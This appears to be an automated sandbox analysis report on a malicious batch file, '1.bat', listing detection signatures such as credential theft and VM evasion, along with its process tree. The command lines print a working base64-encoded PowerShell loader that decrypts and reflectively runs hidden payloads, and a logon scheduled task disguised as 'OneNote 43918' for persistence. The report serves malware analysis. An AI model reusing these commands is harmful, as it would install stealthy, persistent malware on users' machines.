Windows
Analysis Report
1.bat
Overview
General Information
Detection
Score | Range | Whitelisted | Confidence
---|---|---|---
96 | 0 - 100 | false | 100%
Signatures
Antivirus detection for URL or domain
Yara detected Powershell dedcode and execute
Found large BAT file
Obfuscated command line found
Powershell drops PE file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Suspicious command line found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Tries to load missing DLLs
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
- System is w10x64
- cmd.exe (PID: 2180 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\1.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 4404 cmdline: cmd /c \"set __=^&rem\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- cmd.exe (PID: 5144 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\1.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 3424 cmdline: cmd /c \"set __=^&rem\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- cmd.exe (PID: 3288 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\1.bat';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gTURic0IoJFNlcVdSKXskd0hHV2E9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JHdIR1dhLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskd0hHV2EuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyR3SEdXYS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnck00OStQTWJuUlQyRjJpZi9qTERmTGZpeW5XVC84bXQ5UlYvWE9GN1ZnRT0nKTskd0hHV2EuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnU29yNlJDQ3l0RG4xc2FtU0RaQWNVdz09Jyk7JFRZQ3VNPSR3SEdXYS5DcmVhdGVEZWNyeXB0b3IoKTskS3l4VGU9JFRZQ3VNLlRyYW5zZm9ybUZpbmFsQmxvY2soJFNlcVdSLDAsJFNlcVdSLkxlbmd0aCk7JFRZQ3VNLkRpc3Bvc2UoKTskd0hHV2EuRGlzcG9zZSgpOyRLeXhUZTt9ZnVuY3Rpb24gZ3J4eUIoJFNlcVdSKXskTnJjTFE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkU2VxV1IpOyRIVER1Uz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JFBaRkJzPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJE5yY0xRLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskUFpGQnMuQ29weVRvKCRIVER1Uyk7JFBaRkJzLkRpc3Bvc2UoKTskTnJjTFEuRGlzcG9zZSgpOyRIVER1Uy5EaXNwb3NlKCk7JEhURHVTLlRvQXJyYXkoKTt9JElnR3V4PVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskR2VMcUc9Z3J4eUIgKE1EYnNCIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJElnR3V4LCA1KS5TdWJzdHJpbmcoMikpKSk7JGJZbm1XPWdyeHlCIChNRGJzQiAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRJZ0d1eCwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kYllubVcpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJEdlTHFHKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- powershell.exe (PID: 5824 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
- powershell.exe (PID: 4456 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
- powershell.exe (PID: 5328 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\Desktop\1') MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 1016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 1576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 43918' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 3292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 4404 cmdline: "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\user\AppData\Roaming\strt.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 1016 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\strt.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 3784 cmdline: cmd /c \"set __=^&rem\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- cmd.exe (PID: 4688 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\strt.cmd';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gTURic0IoJFNlcVdSKXskd0hHV2E9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JHdIR1dhLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskd0hHV2EuUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyR3SEdXYS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnck00OStQTWJuUlQyRjJpZi9qTERmTGZpeW5XVC84bXQ5UlYvWE9GN1ZnRT0nKTskd0hHV2EuSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnU29yNlJDQ3l0RG4xc2FtU0RaQWNVdz09Jyk7JFRZQ3VNPSR3SEdXYS5DcmVhdGVEZWNyeXB0b3IoKTskS3l4VGU9JFRZQ3VNLlRyYW5zZm9ybUZpbmFsQmxvY2soJFNlcVdSLDAsJFNlcVdSLkxlbmd0aCk7JFRZQ3VNLkRpc3Bvc2UoKTskd0hHV2EuRGlzcG9zZSgpOyRLeXhUZTt9ZnVuY3Rpb24gZ3J4eUIoJFNlcVdSKXskTnJjTFE9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkU2VxV1IpOyRIVER1Uz1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JFBaRkJzPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJE5yY0xRLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskUFpGQnMuQ29weVRvKCRIVER1Uyk7JFBaRkJzLkRpc3Bvc2UoKTskTnJjTFEuRGlzcG9zZSgpOyRIVER1Uy5EaXNwb3NlKCk7JEhURHVTLlRvQXJyYXkoKTt9JElnR3V4PVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskR2VMcUc9Z3J4eUIgKE1EYnNCIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJElnR3V4LCA1KS5TdWJzdHJpbmcoMikpKSk7JGJZbm1XPWdyeHlCIChNRGJzQiAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRJZ0d1eCwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kYllubVcpLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJEdlTHFHKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- powershell.exe (PID: 4120 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
- powershell.exe (PID: 6208 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
- powershell.exe (PID: 1216 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\user\AppData\Roaming\strt') MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 1864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 760 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 43918' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
- conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 5388 cmdline: C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\user\AppData\Roaming\strt.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
No configs have been found
Source | Rule | Description | Author | Strings
---|---|---|---|---
 | JoeSecurity_PowershellDedcodeAndExecute | Yara detected Powershell dedcode and execute | Joe Security | 
 | JoeSecurity_PowershellDedcodeAndExecute | Yara detected Powershell dedcode and execute | Joe Security | 
System Summary
Source: | Author: Florian Roth (Nextron Systems) |